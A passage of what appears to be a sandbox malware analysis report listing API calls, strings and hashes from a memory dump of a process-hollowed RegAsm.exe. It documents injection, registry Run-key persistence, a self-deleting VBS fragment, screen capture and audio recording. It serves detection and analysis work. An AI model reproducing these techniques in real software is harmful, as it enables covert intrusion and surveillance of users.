                                  • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free$InfoLocale_abort
                                • String ID:
                                • API String ID: 1663032902-0
                                • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$InfoLocale_abort_free
                                • String ID:
                                • API String ID: 2692324296-0
                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                • String ID:
                                • API String ID: 1272433827-0
                                • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                • String ID:
                                • API String ID: 1084509184-0
                                • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                Function 00418E76 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                • DeleteDC.GDI32(00000000), ref: 00418F2A
                                • DeleteDC.GDI32(00000000), ref: 00418F2D
                                • DeleteObject.GDI32(00000000), ref: 00418F30
                                • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                • DeleteDC.GDI32(00000000), ref: 00418F62
                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                • GetIconInfo.USER32 ref: 00418FBD
                                • DeleteObject.GDI32(?), ref: 00418FEC
                                • DeleteObject.GDI32(?), ref: 00418FF9
                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                • DeleteDC.GDI32(?), ref: 0041917C
                                • DeleteDC.GDI32(00000000), ref: 0041917F
                                • DeleteObject.GDI32(00000000), ref: 00419182
                                • GlobalFree.KERNEL32(?), ref: 0041918D
                                • DeleteObject.GDI32(00000000), ref: 00419241
                                • GlobalFree.KERNEL32(?), ref: 00419248
                                • DeleteDC.GDI32(?), ref: 00419258
                                • DeleteDC.GDI32(00000000), ref: 00419263
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 479521175-865373369
                                • Opcode ID: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                • Opcode Fuzzy Hash: 089398b6e32a15a2bb07324b2b74cb9d300fdf9583fe9699c99010c1927bcddc
                                • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                Function 004180EF Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 289libraryloaderthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004182ED
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                • ResumeThread.KERNEL32(?), ref: 00418435
                                • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                • GetLastError.KERNEL32 ref: 0041847A
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                • API String ID: 4188446516-3035715614
                                • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A
                                Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                • ExitProcess.KERNEL32 ref: 0040D7D0
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                • API String ID: 1861856835-332907002
                                • Opcode ID: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                • Opcode Fuzzy Hash: e9f8996b9413f065d588b702d7c496c9e290e02a5e9f4f4bb55cf67c86df2bed
                                • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                  • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                  • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                  • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                  • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,63771986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                • ExitProcess.KERNEL32 ref: 0040D419
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2557013105
                                • Opcode ID: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                • Opcode Fuzzy Hash: 622902c84db1d26943d281a003d45daafdd4eec93442fd148fd25107dc5c202e
                                • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                • GetCurrentProcessId.KERNEL32 ref: 00412541
                                • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                • lstrcatW.KERNEL32 ref: 00412601
                                  • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                • Sleep.KERNEL32(000001F4), ref: 00412682
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: .exe$8SG$WDH$exepath$open$temp_
                                • API String ID: 2649220323-436679193
                                • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                • PathFileExistsW.SHLWAPI(00000000), ref: 0041B18E
                                • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                • SetEvent.KERNEL32 ref: 0041B219
                                • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                • CloseHandle.KERNEL32 ref: 0041B23A
                                • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                • API String ID: 738084811-2094122233
                                • Opcode ID: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                • Opcode Fuzzy Hash: 3185081fef31f50e7fd3d82a9eeabdb956d7aa56e174b345bc10df65dc5ab0bc
                                • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction ID: 2ec91bc18be8700290cedec85ec8f66933089e8d2246bcc6fed4c3761e19f715
                                • Opcode Fuzzy Hash: 62b265300192e2cf3fc36ee1b19606fb2409bb2919511e1e0316a81c88f5e1bc
                                • Instruction Fuzzy Hash: EB414E72644308BAE210DA51DD86FBB7EECEB89B50F40441AF644D60C0D7A4E909DBB3
                                Function 00407270 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,0040764D,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,00407675,004752D8,004076CE), ref: 00407284
                                • GetProcAddress.KERNEL32(00000000), ref: 0040728D
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072A2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072A5
                                • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072B6
                                • GetProcAddress.KERNEL32(00000000), ref: 004072B9
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 004072CA
                                • GetProcAddress.KERNEL32(00000000), ref: 004072CD
                                • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 004072DE
                                • GetProcAddress.KERNEL32(00000000), ref: 004072E1
                                • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 004072F2
                                • GetProcAddress.KERNEL32(00000000), ref: 004072F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                • API String ID: 1646373207-255920310
                                • Opcode ID: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction ID: f839149ce94c73eee9bda0254407c114f4740b95dc73f4bc012c28e2a4ae17e7
                                • Opcode Fuzzy Hash: 219bb9ae8fbeca959e8a3246f6ba2b5d667704a520b136de0cc32d122fe89174
                                • Instruction Fuzzy Hash: 520171E0E4431676DB216F3A6C54D4B6F9C9E5125131A087BB409E2292FEBCE800CE6D
                                Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                Download Yara Rule
                                APIs
                                • _wcslen.LIBCMT ref: 0040CE07
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                • CopyFileW.KERNEL32 ref: 0040CED0
                                • _wcslen.LIBCMT ref: 0040CEE6
                                • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                • CopyFileW.KERNEL32 ref: 0040CF84
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                • _wcslen.LIBCMT ref: 0040CFC6
                                • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                • CloseHandle.KERNEL32 ref: 0040D02D
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                • ExitProcess.KERNEL32 ref: 0040D062
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.879469423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                • API String ID: 1579085052-2309681474
                                • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?), ref: 0041C036
                                • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                • lstrlenW.KERNEL32(?), ref: 0041C067
                                • FindFirstVolumeW.KERNEL32 ref: 0041C0A2
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
